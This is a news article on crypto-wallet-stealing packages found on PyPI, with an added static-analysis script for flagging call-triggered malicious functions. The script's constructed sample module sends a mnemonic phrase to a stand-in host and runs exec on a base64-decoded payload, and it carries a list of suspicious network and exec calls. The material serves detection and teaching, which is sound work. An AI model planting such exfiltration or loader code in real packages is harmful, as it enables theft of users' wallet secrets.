Crypto-stealing malware discovered in Python Package Index — Checkmarx


Researchers at the Checkmarx cybersecurity firm sounded the alarm on a dangerous form of malware uploaded to the Python Package Index (PyPI) — a platform for Python developers to download and share code — that steals private keys, mnemonic phrases, and other sensitive user data.

According to the firm, a suspicious user uploaded the malware inside several different software packages that posed as decoding tools for popular wallets such as MetaMask, Atomic, TronLink, Ronin, and other industry staples.

The malicious code was embedded deep within the packages, surrounded by what appeared to be harmless code, which allowed it to go largely undetected.


An earlier set of malicious software packages uploaded to the Python Package Index in March 2024. Source: Checkmarx

However, upon closer inspection, specific components of the code allowed the attackers to take control of cryptocurrency wallets and move funds once unsuspecting users called specific functions in the packages. Nothing malicious ran at install or import time, so the packages looked benign to anyone who merely installed them.

Researchers at Checkmarx first discovered this attack vector in March 2024, which led PyPI to temporarily suspend new project creation and new user registration until the malicious packages were removed, which they eventually were.
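The behaviour described above, malicious activity that sits inside a function and fires only when a user calls it, is exactly what an install-and-import sandbox misses. The following static triage script is an added example written for this article; it is not Checkmarx's tooling or code from the reported packages. It parses a module's source with Python's `ast` module and reports which functions reach the network, spawn processes or execute dynamically decoded code, and separately checks whether any of those calls happen at module level. The sample module, its function names and the `example.invalid` URL are constructed for this example.

```python
"""Static triage of a Python module for call-triggered malicious behaviour.

Added example, not Checkmarx's tooling. A wallet "decoder" package can
look harmless at install/import time and only act once a specific
function is invoked, so the scan reports suspicious calls per function
and contrasts them with what runs at module level.
"""
import ast
from typing import Dict, Set

# Calls that a genuine offline wallet-data decoder rarely needs.
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "urllib.request.Request",
    "requests.get", "requests.post",
    "socket.socket", "socket.create_connection",
    "subprocess.run", "subprocess.Popen", "os.system",
    "exec", "eval", "compile",
    "base64.b64decode", "marshal.loads", "zlib.decompress",
}

# Constructed sample module (not real package code): a plausible-looking
# decoder whose upload only happens when recover_mnemonic() is called.
SAMPLE_MODULE = '''
import base64, json
import requests

def decode_keystore(blob: bytes) -> dict:
    """Parse a wallet keystore file."""
    return json.loads(blob)

def recover_mnemonic(words):
    phrase = " ".join(words)
    # Nothing in the function name hints at this:
    requests.post("https://example.invalid/collect", data={"p": phrase})
    return phrase

def _loader(payload: str):
    exec(base64.b64decode(payload))
'''


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from an Attribute/Name chain, or '' if not plain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _calls_in(node: ast.AST) -> Set[str]:
    """All suspicious call targets reachable beneath this node."""
    return {
        _dotted_name(n.func)
        for n in ast.walk(node)
        if isinstance(n, ast.Call) and _dotted_name(n.func) in SUSPICIOUS_CALLS
    }


def suspicious_functions(source: str) -> Dict[str, Set[str]]:
    """Map each function name to the suspicious calls inside its body.

    These fire only when a user invokes the function, which is why an
    import-time sandbox run can come back clean.
    """
    tree = ast.parse(source)
    report: Dict[str, Set[str]] = {}
    for func in ast.walk(tree):
        if isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            hits = _calls_in(func)
            if hits:
                report[func.name] = hits
    return report


def module_level_suspicious_calls(source: str) -> Set[str]:
    """Suspicious calls that execute on import (outside any def/class)."""
    tree = ast.parse(source)
    hits: Set[str] = set()
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        hits |= _calls_in(stmt)
    return hits


if __name__ == "__main__":
    print("runs on import:", module_level_suspicious_calls(SAMPLE_MODULE) or "nothing")
    for name, calls in suspicious_functions(SAMPLE_MODULE).items():
        print(f"{name}(): {sorted(calls)}")
```

Run against the constructed sample, the module-level scan reports nothing, while `recover_mnemonic()` is flagged for `requests.post` and `_loader()` for `exec` over `base64.b64decode`. The call list is a starting point, not a verdict: a legitimate package may well use `requests`, so the value of the scan is pointing a reviewer at the specific functions that deserve a look before the package is trusted.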

Despite the vigilance and quick action of Checkmarx and the Python Package Index to address the issue, the malware returned in early October and has reportedly been downloaded more than 3,700 times since.


Malware: a modern digital plague

The malware uploaded to the Python developer hub is concerning, but far from unique. In September, cybersecurity firm McAfee Labs discovered sophisticated malware that targeted Android smartphones and could steal private keys by scanning images stored on the phone.

The malware used optical character recognition (OCR) to extract text from those images, and it spread mainly through text-message links that prompted unsuspecting users to download malicious apps posing as legitimate software.

Security specialists at HP's Wolf Security team later reported that cybercriminals are increasingly using artificial intelligence to write malware, a development that significantly lowers the barrier to entry for creating malicious programs.

More recently, in October, more than 28,000 users fell prey to malware disguised as office productivity software and gaming applications. Fortunately, the malware only managed to steal a total of about $6,000.
